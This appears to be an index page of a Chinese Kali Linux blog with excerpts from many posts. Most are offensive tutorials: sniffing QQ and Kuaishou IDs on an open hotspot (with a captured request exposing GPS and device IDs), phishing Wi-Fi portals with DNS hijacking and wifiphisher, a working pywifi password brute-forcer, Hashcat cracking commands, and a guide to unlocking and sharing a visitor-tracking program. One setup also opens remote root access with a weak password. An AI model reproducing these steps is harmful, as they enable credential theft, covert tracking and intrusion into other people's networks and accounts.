ISHACK AI BOT 发布的所有帖子
-
浅谈对本博客的SEO优化
什么是SEO,所谓seo优化就是让百度,360,搜狗,等搜索引擎收录你的破站。也许你会说,搞那个干吗,反正我的网站百度迟早会收录的。但是SEO可以使你的网站更快的让搜索引擎收录,以及在搜索引擎中的排名。 首先我们先看看本站的数据吧 这里以百度为例,说说常见的SEO的几个数据 主动推送:最为快速的提交方式,建议您将站点当天新产出链接立即通过此方式推送给百度,以保证新链接可以及时被百度收录。 sitemap:您可以定期将网站链接放到Sitemap中,然后将Sitemap提交给百度。百度会周期性的抓取检查您提交的Sitemap,对其中的链接进行处理,但收录速度慢于主动推送。 手工提交:如果您不想通过程序提交,那么可以采用此种方式,手动将链接提交给百度。 自动推送:是轻量级链接提交组件,将自动推送的JS代码放置在站点每一个页面源代码中,当页面被访问时,页面链接会自动推送给百度,有利于新页面更快被百度发现。 优化方法基于插件的优化:我们可以根据不同的平台,安装不同的seo插件。如:DZ,typecho,WP等常见的程序,下载相应的插件即可。 利用Python爬虫 我们可以利用下面代码对网站进行爬虫 import os import re import shutil REJECT_FILETYPE = 'rar,7z,css,js,jpg,jpeg,gif,bmp,png,swf,exe' def getinfo(webaddress): global REJECT_FILETYPE url = 'http://'+webaddress+'/' print 'Getting>>>>> '+url websitefilepath = os.path.abspath('.')+'/'+webaddress if os.path.exists(websitefilepath): shutil.rmtree(websitefilepath) outputfilepath = os.path.abspath('.')+'/'+'output.txt' fobj = open(outputfilepath,'w+') command = 'wget -r -m -nv --reject='+REJECT_FILETYPE+' -o '+outputfilepath+' '+url tmp0 = os.popen(command).readlines() print >> fobj,tmp0 allinfo = fobj.read() target_url = re.compile(r'\".*?\"',re.DOTALL).findall(allinfo) print target_url target_num = len(target_url) fobj1 = open('result.txt','w') for i in range(target_num): if len(target_url[i][1:-1])<70: print >> fobj1,target_url[i][1:-1] else: print "NO" fobj.close() fobj1.close() if os.path.exists(outputfilepath): os.remove(outputfilepath) if __name__=="__main__": webaddress = raw_input("Input the Website Address(without \"http:\")>") getinfo(webaddress) print "Well Done."执行完成后,后生成一个result.txt文件。 然后我们利用百度站长平台的提示语法,进行提交。 参数说明: 字段参数类型说明successint成功推送的url条数remainint当天剩余的可推送url条数not_same_sitearray由于不是本站url而未处理的url列表成功返回示例:{ "remain":4999998, "success":2, "not_same_site":[], "not_valid":[] }
-
HashCat 分布式破解
我们在利用Hashcat破解密码的时候,总是由于我们设备的问题而焦头烂额。显卡太垃圾,破解一个密码需要几年,我们该如何解决这种尴尬呢?今天我们来看看Hashcat的分布式破解吧! 官方参数如下:-S, --slow-candidates Enable slower (but advanced) candidate generators | 启用较慢(但高级)的候选生成器 --brain-server Enable brain server | 启用BRAIN服务器 -z, --brain-client Enable brain client, activates -S | 启用大脑客户端,激活-s --brain-client-features Define brain client features, see below | 定义大脑客户端功能,见下文 --brain-host Brain server host (IP or domain) | BRAIN服务器主机(IP或域) --brain-port Brain server port | BRAIN服务器端口 --brain-password Brain server authentication password | BRAIN服务器身份验证密码 --brain-session Overrides automatically calculated brain session | 覆盖自动计算的大脑会话 --brain-session-whitelist Allow given sessions only, separated with commasBrain Client Features 参数[ Brain Client Features ] - 1 | Send hashed passwords /**发送哈希密码*/ 2 | Send attack positions /**发送攻击位置*/ 3 | Send hashed passwords and attack positions /**发送哈希密码和攻击位置*/实例启动一个 HashCat 服务器 hashcat --brain-server --brain-host=<IP> --brain-port=<PORT> --brain-password=<PWD>启动一个 Client 开始破解 hashcat -O --brain-client --brain-client-features=<Brain Client Features> --brain-host=<BRAIN-IP> --brain-port=<BRAIN-PORT> --brain-password=<BRAIN-PWD> -m <Attack Modes> -a <Hash modes> '<PASSWORD>' <Built-in Charsets | Dic Path> --forceClient Demo hashcat -O --brain-client --brain-client-features=3 --brain-host=192.168.1.112 --brain-port=996110 --brain-password=hashpwd -m 0 -a 3 '0b8aff0438617c055eb55f0ba5d226fa' ?a?a?a --force
-
利用Wireshark分析局域网中的QQ号和快手ID
首先我们先搭建一个AP,没加密的那种、能联网的那种。 。搭建方法比较多,可以参考我们以前的教程。这里不在多说。 对目标浏览网站图片的窃取在kali下,我们利用Driftnet即可! 执行命令: driftnet -i wlan0 对目标账号和密码的分析需要注意的是,这种方法只对http协议的网站有效。 我们筛选所有的post数据包http.request.method == "POST" 对目标QQ号分析对于电脑QQ而言,很简单。我们只需要分析qicq协议即可得到目标的QQ号。但是对于手机QQ由于用的协议不同,故而不能利用此种方法。通过对数据包的分析,我们可以利用对QQ空间的访问信息,获取目标QQ。 输入uin=进行报文筛选 对快手信息分析用同样的方式,我们利用关键词user_id进行报文筛选。 得到了下面一条信息 http://apissl.ksapisrv.com/rest/n/user/settings?mod=Xiaomi%28MI%208%20SE%29&appver=6.8.1.10783&isp=CTCC&lon=104.929677&language=zh-cn&sys=ANDROID_9&max_memory=256&ud=666153773&egid=DFP1556DD2EE54045D41BA2E3C68BEC77456F8373E79C118B684EC17B6FE6F18&oc=XIAOMI&sh=2244&net=WIFI&lat=33.966839&app=0&kpf=ANDROID_PHONE&ver=6.8&c=XIAOMI&sw=1080&ftt=&kpn=KUAISHOU&country_code=cn&hotfix_ver=&did_gt=1568459175375&iuid=&did=ANDROID_8b04d8f290ada9c8 分析信息: 手机型号:Xiaomi8 MI SE 快手版本:appver=6.8.1.10783 系统:=ANDROID 9 快手id 666153773 获取其他信息分组详情——字符串 user_name :获取网名 cityname:城市名 caption:发表的视频 usrname:查看关注的好友(可多搜索几次) 这样,我们就对网络中的数据包进行了一层层分析。所以给大家的建议是不要连接开放的WiFi,或者在使用具有加密协议的网站。这样我们的个人信息才所保护。
-
基于AP+数据库实现WIFI认证的方案
法律声明本文的宗旨是让更多的人了解身边的WiFi安全和WiFi安全爱好者学习研究,而非提供恶意教学。造成的法律后果请自行承担,与本站和作者无关。特此声明!!!!! 环境说明apache+php7.3+mysqlkali2019.43070无线网卡html页面 配置web服务器首先将整个站点上传到/var/www/html下。 配置config.php<?php $dbhost = 'localhost'; // mysql服务器主机地址 $dbuser = 'root'; // mysql用户名 $dbpass = 'root'; // mysql用户名密码 ?>注意: 在配置此文件之前,请先配置好你的数据库。数据库密码为你初始化设置的密码。 如果对数据库的配置有问题的,请参考文章 kali自带mysql配置 kali是自带mysql服务,今天我们来看看,如何配置mysql。启动myslqservice mysql sta... 安装站点首先我们启动apache和mysql service apache2 start service mysql start这里为了使安装成功,我们利用mysql -u root -p登录数据库,检测账号和密码的准确性。 在浏览器访问http://kali的ip/install.php 提示如下:证明安装成功! 如果提示下面错误: Connection failed: Access denied for user 'root'@'localhost' (using password: YES)是因为mysql不支持root用户用ip地址登录。 解决方法: mysql -u root -p use mysql; GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION; flush privileges;这样我们可以使得root账号 密码为123456 的远程账号。 测试输入kali的ip地址 输入http://ip/admin.php OK!到此为止,我们的服务器端配置完成。 现在我们要做的就是搭建一个钓鱼AP,然后进行DNS劫持,跳转到我们的这个页面。 利用dns劫持钓鱼下载wifi.sh 在终端给予权限chmod +X wifi.sh 演示如下: 手机演示 附件下载附件下载
-
利用Hashcat破解WiFi密码
关于HashcatHashcat是什么呢?Hashcat是当前最强大的开源密码恢复工具,你可以访问Hashcat.net网站来了解这款工具的详细情况。本质上,Hashcat 3.0是一款高级密码恢复工具,可以利用CPU或GPU资源来攻击160多种哈希类型的密码 准备hashcat(5.1)kali自带cap数据包字典一份(为了节约时间 就不演示枚举了) cap文件转化为hccap格式aircrack-ng <out.cap> -J <out.hccap> 需要注意的是:此种方法转换的数据包只适应比较早的hashcat,新版的已经废弃。 如下:我么转换时会提示下面错误! 解决方法: 到https://hashcat.net/cap2hccapx/上传我们的数据包 转换后的数据包格式为.hccapx 开始破解hashcat -m 2500 xxx.hccapx dics.txt参数说明: xxx.hccapx(转换的数据包)dics.txt (字典) 但是运行上面命令后,又会报错。 Device #1: Not a native Intel OpenCL runtime. Expect massive speed loss. You can use --force to override, but do not report related errors. No devices found/left. 不用担心,我们只需要在后面添加一个参数`--force`即可。hashcat -m 2500 11.hccapx pass.txt --force ![][4] ### 显示破解完成的密码hashcat -m 2500 11.hccapx pass.txt --force --show 填坑因为在VM中安装的kali,所以你会遇到下面错误。 不用担心,解决方法如下: 将处理器改成单处理且单核,增加内存至4G 关于掩码暴力破解由于wifi密码的破解,我们都是基于字典的破解,成功率的大小和字典有直接的关系。但是在没有字典的情况下我们该怎么办? 这时,我们可以试试枚举破解。 假设我们只知道WiFi密码是8位的纯数字 hashcat -a 3 -m 2500 777.hccapx ?d?d?d?d?d?d?d?d --force 不到10s就破解完成。 Hashcat相关参数说明下面使常见的参数,想了解更多的参数可以hashcat --help查看 -a 指定要使用的破解模式,其值参考后面对参数。“-a 0”字典攻击,“-a 1” 组合攻击;“-a 3”掩码攻击。 -m 指定要破解的hash类型,如果不指定类型,则默认是MD5 -o 指定破解成功后的hash及所对应的明文密码的存放位置,可以用它把破解成功的hash写到指定的文件中 --force 忽略破解过程中的警告信息,跑单条hash可能需要加上此选项 --show 显示已经破解的hash及该hash所对应的明文 --increment 启用增量破解模式,你可以利用此模式让hashcat在指定的密码长度范围内执行破解过程 --increment-min 密码最小长度,后面直接等于一个整数即可,配置increment模式一起使用 --increment-max 密码最大长度,同上 --outfile-format 指定破解结果的输出格式id,默认是3 --username 忽略hash文件中的指定的用户名,在破解linux系统用户密码hash可能会用到 --remove 删除已被破解成功的hash -r 使用自定义破解规则攻击模式 0 | Straight(字段破解) 1 | Combination(组合破解) 3 | Brute-force(掩码暴力破解) 6 | Hybrid Wordlist + Mask(字典+掩码破解) 7 | Hybrid Mask + Wordlist(掩码+字典破解)掩码设置 这里列一下常见的掩码字符集 ?d:数字 ?u:大写字母 ?l:小写字母 八位数字密码:?d?d?d?d?d?d?d?d 八位未知密码:?a?a?a?a?a?a?a?a 前四位为大写字母,后面四位为数字:?u?u?u?u?d?d?d?d 前四位为数字或者是小写字母,后四位为大写字母或者数字:?h?h?h?h?H?H?H?H 前三个字符未知,中间为admin,后三位未知:?a?a?aadmin?a?a?a 6-8位数字密码:--increment --increment-min 6 --increment-max 8 ?l?l?l?l?l?l?l?l 6-8位数字+小写字母密码:--increment --increment-min 6 --increment-max 8 ?h?h?h?h?h?h?h?h实例7位小写字母破解: hashcat-a 3 -m 0 --force 7a47c6db227df60a6d67245d7d8063f3 ?l?l?l?l?l?l?l1-8位数字破解: hashcat -a 3 -m 0 --force 4488cec2aea535179e085367d8a17d75 --increment --increment-min 1 --increment-max 8 ?d?d?d?d?d?d?d?d1-8位小写字母+数字破解 hashcat -a 3 -m 0 --force ab65d749cba1656ca11dfa1cc2383102 --increment --increment-min 1 --increment-max 8 ?h?h?h?h?h?h?h?h特定字符集:123456abcdf!@+- hashcat -a 3 -1 123456abcdf!@+- 8b78ba5089b11326290bc15cf0b9a07d ?1?1?1?1?1注意一下:这里的-1和?1是数字1,不是字母l 1-8为位符集:123456abcdf!@+- hashcat -a 3 -1 123456abcdf!@+- 9054fa315ce16f7f0955b4af06d1aa1b --increment --increment-min 1 --increment-max 8 ?1?1?1?1?1?1?1?11-8位数字+大小写字母+可见特殊符号 hashcat -a 3 -1 ?d?u?l?s d37fc9ee39dd45a7717e3e3e9415f65d --increment --increment-min 1 --increment-max 8 ?1?1?1?1?1?1?1?1或者: hashcat -a 3 d37fc9ee39dd45a7717e3e3e9415f65d --increment --increment-min 1 --increment-max 8 ?a?a?a?a?a?a?a?a字典破解 -a 0是指定字典破解模式,-o是输出结果到文件中 hashcat -a 0 ede900ac1424436b55dc3c9f20cb97a8 password.txt -o result.txt批量破解 hashcat -a 0 hash.txt password.txt -o result.txt其他--hwmon-temp-abort=100 GPU温度达到100后,停止(默认90) --session=my 将进度存到my.session文件中,断点续解密
-
利用树莓派在kali环境下搭建Web环境(Apache+Php7.3+Mysql)
前言在kali下我们来搭建web系统环境,在平时我们可在win系列的系统上用Phpstudys等集成环境来搭建,快捷 方便。今天来看看如何在kali下搭建环境。此中安装方法也适应Debian系列的系统。 注意:如果是虚拟机安装的kali 系统已经默认安装。直接用就行了,不需要安装。 安装Apacheapt-get install apache2启动Apacheservice apache2 start验证在浏览器访问kali的ip地址,出现下面的页面证明Apache安装成功。 安装PHP7.3apt-get install php7.3 libapache2-mod-php7.3 php7.3-mysql php7.3-curl php7.3-json php7.3-cgi php7.3-gd其中 php7.3-cgi 、php7.3-gd为相应的PHP模块,如果你的程序需要其他模块的支持,执行apt-get install php7.3-需安装的模块即可。 填坑:笔者在安装过程中,在安装完成PHP后,但是不能解析。通过分析是没有安装libapache2-mod-php7.3 如果不能解析PHP的,请执行apt-get install libapache2-mod-php7.3 即可。 验证是否安装执行命令php -v 这样 我们的PHP就安装完成了。 PS: 查看安装的模块php -m 探针验证我们新建一个php文件 内容如下: <?php phpinfo(); ?>访问探针 安装数据库apt-get install -y mariadb-server mariadb-client这里我们利用mariadb代替Mysql 配置数据库初始化密码 mysql_secure_installation输入自己的密码 一路Y即可! 出现Thanks for using MariaDB!则说明初始化成功。 填坑: 登录数据库 mysql -u root -p这时,你会蛋疼的发现直接回车便可以登录,而不需要密码。所以我们需要执行下面命令。登录数据库(回车直接登录) use mysql; update user set plugin="";这样就可以用刚才设置的密码登录数据库。 至此,kali下的web环境就搭建完成了。 搭建修罗轻量论坛程序下载论坛程序 上传到var/www/html 下载地址: 点我下载 登录数据库 创建数据库 root@kali:~#service mysql start root@kali:~#mysql -u root -p Enter password: Welcome to the MariaDB monitor. Commands end with ; or \g. Your MariaDB connection id is 13 Server version: 10.3.20-MariaDB-1 Debian buildd-unstable Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. MariaDB [(none)]> create database bbs; Query OK, 1 row affected (0.001 sec) MariaDB [(none)]> 这样我们便创建了一个bbs的数据库 安装论坛程序:
-
对一次窃取用户信息网站的渗透
前言在一个风高夜黑的晚上,我深深的抽了一口烟。看了看窗外匆匆的行人,正在感叹生活的不易。突然我的企鹅di~di~的响了起来。定眼一看我去还是个女的。发来了一个链接…… 好奇心害死猫 顺手就点开了链接。 但是提示404错误。嗯……狠狠地抽口了烟,陷入了沉思! 既然是短连接,那就还原,看看原来的网址。 前期的信息收集拿出神器nmap扫一波看看。 可见,开启了我们常见的80、888,、3306、8080、8888等端口,我们访问888和8888发现是宝塔面板 扫描网站目录: 找到了后台目录 admin以及安装目录install 网站cms查询 得到了apache等相关的信息,并未得到相关的cms信息。 漏洞扫描启动Acunetix丢进目录 扫一波 扫到了SQL注入漏洞和XSS漏洞 关于这两个漏洞的利用,在前面的教程中已经提到了很多次,这里不再啰嗦。 提起sqlmap来一波。 先到存在sql注入的页面看看,嗯哼……是个查询页面。Burp搞起! 利用sqlmap注入 获取管理员密码 登录后台 拿Shell 由于后台没有上传点,上传也就没法搞,还有一种情况就是如果知道网站的绝对路劲。我们可以利用sqlmap拿下shell。 对代码的审计通过观察,这个网站就是一个探针程序。通过分享的连接诱导别人点击。从而获取对方的ip地址和gps信息。感觉挺好玩的! 于是在GitHub在爬了下来送给大家。 附件下载 但是在安装过程中提示如下: 提示未授权,OK我们对代码进行审计 这里有这么一行 function check_authorization(){ $url = "https://xxxxxx/xxtzsq.txt"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $query_authorization = curl_exec($ch); curl_close($ch); if(strpos($query_authorization,"|".$_SERVER['HTTP_HOST'])==0 or $query_authorization=="") 访问https://xxxxxx/xxtzsq.txt 提示如下:##|127.0.0.1|localhost| 这里只运行本地运行和访问,我们在本地服务器新建一个文档,写入你自己的域名或者ip。在将该链接改为http://youip/youname.txt即可!便可完成安装!!!
-
用树莓派发射WIFI开发钓鱼工作站
本文申明 本文的主旨是,让身边的人更加了解WiFi安全问题,而非而已的攻击他人。因本文具有一定的攻击行为,若您阅读后请务必准守国家相关网络安全法规。若由于您的行为造成他人损失的,责任自负。本站、本文不承担任何法律责任。若您同意请接着往下阅读,否则请您离开阅读其他文章。感谢支持!!! 原理示意图 设备清单树莓派(笔记本也可以)无线网卡(两个,只要kali支持的就行)钓鱼页面(文末下载) 拉取开源项目 git clone https://github.com/wifiphisher/wifiphisher.git cd wifiphisher sudo python setup.py install安装错误解决方案 在安装过程中,失败的最重要因素是网络问题,所以在安装过程中请保证网络良好。部分依赖下载失败,请挂乳酸菌或者更换国内的源。 钓鱼页面在文末下载钓鱼页面,放到wifiphisher/data/phishing-pages/oauth-login并替换。 在终端执行下面命令: wifiphisher --essid "FREE WI-FI" -p oauth-loginps: --essid :WiFi信号 视频演示 当用户输入账号等信息后,我们在后台即可得到账号和面。 附件下载 附件下载 解压密码: 查看文章隐藏内容或点我查看
-
树莓派4B安装Kali Linux
前期的准备树莓派4b16G U盘 读卡器kali2019.4镜像网线一根 老夫的树莓派 树莓派正面 组装树莓派需要注意树莓派风扇的连线,脚针如下图: 组装后的效果: 开始刷入系统在 https://www.offensive-security.com/kali-linux-arm-images/ 中,找到RaspberryPi Foundation,根据自己的需要下载镜像 插入内存卡,写入镜像。 点亮你的树莓派将写好的内存卡装载到树莓派中,插入电源!插入网线!由于我没有买屏幕(主要是贵)。我们用ssh连接树莓派。 登录路由器,查看树莓派的ip地址! 打开Xshell连接树莓派。 需要注意的是: 主机名:kali的ip地址 用户名:root 密码:toor 如下:成功连接 配置vnc由于没有屏幕,我们可以按照vnc进行远程桌面。 apt-get install tightvncserver注意:kali2019.4是默认安装的 配置tightvncserver 在终端输入tightvncserver 会提示输入密码,我们输入我们的密码(需要注意的是,这个密码是vnc连接的密码。) 连接vnc主机名:ip:1 用户名:root 密码:刚才自己输入的密码 注意ip后面必须填写:1 下载vnc软件,进行连接。手机效果! 启动命令为 vncserver :1 设置中文在命令行输入”dpkg-reconfigure locales”。 进入图形化界面之后,(空格是选择,Tab是切换,*是选中),选中en_US.UTF-8和zh_CN.UTF-8,确定后,将en_US.UTF-8选为默认。 安装中文字体,”apt-get install xfonts-intl-chinese “和” apt-get install ttf-wqy-microhei” 在终端执行echo LANG="zh_CN.UTF-8" > /etc/default/locale 重启后效果如下: WIFI破解测试 端口映射开启端口映射,我们可以随时随地访问自己的树莓派 setsid ./sunny clientid youid自由安装软件由于树莓派上的kali是阉割版的,所有很多工具是没有的,我们可以用apt命令进行安装,也可以到github去下载。 这里需要给点建议就是,尽量不要安装图形界面的程序,不然会很卡。 挂载硬盘U盘首先我们在/root目录下新建一个U目录 执行命令df -l查看设备 然后执行mount -t ntfs /dev/sda1 /root/U 这样就可以在U目录下,看到U盘中的内容了。 关于WiFi的配置由于买的树莓派是没有显示器,所以我们只能用ssh或者vnc连接。在通过网线连接路由器获取ip地址进行连接。但是这个的缺陷就是我们在外出玩渗透的时候,不可能那个网线去插入。那怎么办呢? 我们可以利用wpa_supplicant.conf配置一个wifi参数。利用手机发送热点,树莓派会自动连接手机的热点。从而进行连接! wpa_supplicant.conf配置进入/etc/wpa_supplicant目录,然后使用系统自带的wpa_passphrase命令创建一个配置文件: cd /etc/wpa_supplicant/ wpa_passphrase "ssid" "12345678" > wpa_supplicant.conf第一个参数为ssid网络名称,第二个为key,写到wpa_supplicant.conf配置文件中 interfaces配置然后,我们编辑/etc/network/interfaces文件: vi /etc/network/interfaces在最后加上如下配置: auto wlan0 allow-hotplug wlan0 iface wlan0 inet manual wpa-roam /etc/wpa_supplicant/wpa_supplicant.conf iface default inet dhcp意思就是启动wlan0网路接口,然后加载刚刚添加的配置文件进行连接。 如上都配置完毕,保存,reboot后,我们在用手机开热点。树莓派会自动连接。 未完待续……
-
kali web渗透测试—信息收集篇
网站基本信息收集网站域名、子域名收集域名解析ip查询网站所有人(whois)负责人联系方式网站基于那个CMS搭建 1x01 网站域名子域名收集这里,我们以本站一级域名bbskali.cn为例,简单看看网站子域名信息的收集。这里介绍几个kali中自带的子域名查询工具。 利用dnsmap查询子域名! dnsmap bbskali.cn 利用fierce查询子域名 fierce -dns bbskali.cn 子域名收集的意义: 假设,我们的主站bbskali.cn通过测试,没有任何可下手的地方。但是我们可以通过旁站的漏洞拿下主站。 ip地址查询查询ip的意义: 通过ip地址,我们可以知道目前的站点开启了哪些端口,以及系统等信息。 方式一:利用ping查询 如,我们要查询www.baidu.com解析到哪个ip地址,执行命令: ping baidu.com当然这种方法针对开启了防PING和加了CDN的域名是无效的。 针对CND域名,我们可以利用国外的VPS去ping,因为大多数站长仅开启了国内的加速。 利用获取到的ip地址,我们利用Nmap扫一波,即可得到当前开启的端口。 whois查找这里,我们可以利用站长工具获取当前站长的相关信息。当然也可以在kali中直接执行whois命令直接获取。 whois baidu.com cms查询方式一:利用云悉查询 方式二:利用kali工具whatweb查询 whatweb 目标 网站目录爬虫通过对网站目录扫描,我们可以得到一些很重要的信息,比如网站的登录后台。 利用dirsearch扫描网站目录 执行命令 python3 dirsearch.py -u https://目标 -e php 当然,也可以用kali自带的工具dirb进行扫描。 dirb 目标对管理员后台的暴力破解 burp 2.0暴力破解网站登录密码 准备神器burp字典一份网站后台系统(以路由器登录后台为列)启动burp软件我已经共享了,大家可以看这里!拦截数据... 网站漏洞的扫描渗透的目的就是找出网站的漏洞,并告知管理员。让其尽快修复,对于不同的网站,漏洞各式各样。扫描漏洞的方法比较多,有专业的工具如NESSUS nikto sqlmap等等,这里就不再一一说明了。 关于nikto教程 nikto使用教程 1:普通扫描nikto -h 目标实例:nikto -h 192.168.3.1112:扫描指定端口nikto -... 未完待续……后面想到啥了在补充吧!
-
利用Python破解WiFi
视频演示 环境准备python2.7Kali 2019.4无线网卡弱口令字典 安装模块pip install pywifi注:没有没有安装pip先安装pip 安装命令: apt-get install python-pip部分代码解读: 导入模块 from pywifi import * import time import sys def main(): #扫描时常 scantimes = 3 #单个密码测试延迟 testtimes = 15 output = sys.stdout #结果文件保存路径 files = "TestRes.txt" #字典列表 keys = open(sys.argv[1],"r").readlines() print "|KEYS %s"%(len(keys)) #实例化一个pywifi对象 wifi = PyWiFi() #选择定一个网卡并赋值于iface iface = wifi.interfaces()[0] #通过iface进行一个时常为scantimes的扫描并获取附近的热点基础配置 scanres = scans(iface,scantimes) #统计附近被发现的热点数量 nums = len(scanres) print "|SCAN GET %s"%(nums) print "%s\n%-*s| %-*s| %-*s| %-*s | %-*s | %-*s %*s \n%s"%("-"*70,6,"WIFIID",18,"SSID OR BSSID",2,"N",4,"time",7,"signal",10,"KEYNUM",10,"KEY","="*70) #将每一个热点信息逐一进行测试 for i,x in enumerate(scanres): #测试完毕后,成功的结果讲存储到files中 res = test(nums-i,iface,x,keys,output,testtimes) if res: open(files,"a").write(res) 扫描周围热点 def scans(face,timeout): #开始扫描 face.scan() time.sleep(timeout) #在若干秒后获取扫描结果 return face.scan_results() 热点测试 这里后续推荐将扫描过程数据入库,防止重复扫描,且更加直观。 def test(i,face,x,key,stu,ts): #显示对应网络名称,考虑到部分中文名啧显示bssid showID = x.bssid if len(x.ssid)>len(x.bssid) else x.ssid #迭代字典并进行爆破 for n,k in enumerate(key): x.key = k.strip() #移除所有热点配置 face.remove_all_network_profiles() #讲封装好的目标尝试连接 face.connect(face.add_network_profile(x)) #初始化状态码,考虑到用0会发生些逻辑错误 code = 10 t1 = time.time() #循环刷新状态,如果置为0则密码错误,如超时则进行下一个 while code!=0 : time.sleep(0.1) code = face.status() now = time.time()-t1 if now>ts: break stu.write("\r%-*s| %-*s| %s |%*.2fs| %-*s | %-*s %*s"%(6,i,18,showID,code,5,now,7,x.signal,10,len(key)-n,10,k.replace("\n",""))) stu.flush() if code == 4: face.disconnect() return "%-*s| %s | %*s |%*s\n"%(20,x.ssid,x.bssid,3,x.signal,15,k) return False 查看帮助python wifitest.py -h usage: wifitest.py [-h] [-m {a,m}] [-k KEY_FILE] optional arguments: -h, --help show this help message and exit -m {a,m}, --mode {a,m} test mode:a(auto) or m(manual) -k KEY_FILE, --key_file KEY_FILE test password dict file,default is top10.txt破解测试python wifi.py -m m -k top10.txt 等待片刻!身边的就会获取到身边的WiFi密码! 分析优点: 不需要传统的抓包,不需要客户端。 缺点:成功率大小依赖于字典。 程序下载附件下载 解压密码:文末隐藏内容
-
利用kali搭建阅后即焚
题记当今社会,网络技术飞速发展。但是面临的信息安全问题越来越突出,信息泄露、个人的隐私被曝光、聊天记录被监听等等。通常我们会在各种平台上看到一些类似于阅后即焚效果的网站。很大程度上保护了我们的隐私,但是真真的是阅后即焚吗?比如 你发的朋友圈,在删除了这条朋友圈,你确定在服务器上真实删除了吗?结果就不为人知了? 利用kali安装阅后即焚,实现真正意义的保护个人隐私。 首先启动apacher 和mysql service apache2 start service mysql start由于kali是默认安装了apacher mysql php7.3我们就跳过具体的安装过程了! 配置mysql kali自带mysql配置 kali是自带mysql服务,今天我们来看看,如何配置mysql。启动myslqservice mysql sta... 根据上诉文章,配置好mysql的登录账号。登录mysql创建数据库!mysql -u root -p #登录数据库 create database yue; #创建了一个名为yue的数据库 show databases; #显示当前创建的数据库 复制源码下载源码 ,复制到/var/www/html 对文件进行解压 unzip PasteBurn.zip 将解压的文件复制到根目录 修改配置文件config.php 域名这里我们填写kali的ip地址 安装在浏览器中执行 http://kali ip/install.php即可完成安装! 但是,我们这样搭建后,只能通过内网设备访问,那如何分析给QQ好友或wx好友呢?其实很简单,我们只需要利用花生壳做内网穿透即可。在不买服务器不花一分钱的情况下,我们便完成了阅后即焚程序的搭建。 本程序项目地址:PasteBurn 当然,要是你足够懒,没事,请访问博主搭建的。 阅后即焚
-
【老夫的少女心】Kali2019.4修改Gurb boot图片和登录界面
首先来看看GURB的效果 登录界面的效果 如何修改修改gurb boot进入kali,切换到文件目录cd//boot/grub/themes/kali/分别修改grub-4x3.png和grub-16x9.png这两个图片即可。注意图片格式为png大小像素不能发生变化。 修改登录背景修改文件/usr/share/backgrounds/kali/下的kali-light-16x9.png和kali-light-4x3.png即可。其他的根据分辨率自行修改。 PS:在修改的过程中,一定要注意图片的分辨率问题,这里建议将原图拖动到ps中,做覆盖处理即可,注意图片的格式为png。
-
VM安装Kali Linux 2019.4及新版特性
前期的准备kali linux(2019.4)VM15(文末提供下载地址)牛X的电脑(推荐配置 i7处理器 16G内存 1T硬盘 最好将kali安装在固态盘中) 准备好这些东西,我们就可以愉快的玩耍了! 首先我们到kali官网下载最新版的kaliImage NameTorrentVersionKali Linux 64-BitTorrent2019.4Kali Linux 32-BitTorrent2019.4对于下载,不少的小伙伴说下载慢。这很正常,毕竟是国外的服务器。笔者这里是电信网络下载速度最高5M五分钟就下载完成了。 vm安装kali01 启动虚拟机,点击新建虚拟机——自定义 02在兼容性我们尽量选高一点,这里我们选15.x。 03 选择稍后安装系统(也可以直接选定第二个安装程序的iso的位置) 04 因为kali是基于Debian深度开发的,这里我们选Linux下的debian系列 05 设置虚拟机的名称和虚拟机的位置(不要讲虚拟机放到默认目录C盘,否则会占用20-40g的系统空间。) 06 设置处理器的数量(最少2核 树莓派可以1核 核数越高 处理能力越强) 07 设置内存 (2G起步) 08 网络设置 默认NAT 这时,我们基本设置完成,其余选择直接点击下一步完成即可。 09 点击刚才建立的虚拟机,设置镜像的文件位置。 10 启动虚拟机,点击 Graphical install(图形化安装) 11 选择语言 12 设置主机的名称 默认为kali 13 填写域名 (留空即可) 14 设置kali的登录密码(如果这一步 你没填,则默认密码toor) 15 配置磁盘分区(为了方便,我们直接将20g 磁盘全部挂载到主目录。当然在后面你可以新建一块磁盘,单独给某个目录挂载。)这里我们使用整个磁盘。 16 将所有文件 放到同一个目录中 17 写入分区 18 给分区写入数据 19 安装系统 在这一步,因电脑差异不同安装速度不同。耐心等待即可! 20 配置软件管理器 需要注意的是,在后面的安装过程中一定要保证网络的通畅,一路点是即可! 安装完成,系统会自动重启。 新版特性新的默认桌面环境,Xfce引入Kali Undercover模式Kali文档有了一个新家,现在支持Git公共包装-把你的工具放进Kali安装在Android上的NetHunter Kex – Full Kali 桌面添加PowerShell Kali Undercover模式在终端中执行kali-undercover即可快速切换kali和win10主题,目的是在某些环境中想用Kali做点什么,却又不想被人轻易发现。 Powershell从去年六月份开始,官方就有文档说明在Kali Linux中安装PowerShell,而在今年11月份的更新中,powershell已添加到主存储库中,现在只需要运行: apt update && apt -y install powershell就能让你的系统拥有强大的PowerShell。 如果你已经安装了kali 用下面命令升级即可root@kali:~#cat </etc/apt/sources.list deb http://http.kali.org/kali kali-rolling main non-free contrib EOF root@kali:~# root@kali:~#apt update && apt -y full-upgrade root@kali:~# root@kali:~#[ -f /var/run/reboot-required ] && reboot -f切换到新版的Xfce桌面环境: root@kali:~#apt -y install kali-desktop-xfce相关附件下载本文付费内容如下: vm15pro kali2019.4Torrent
-
Office 2019安装及其破解
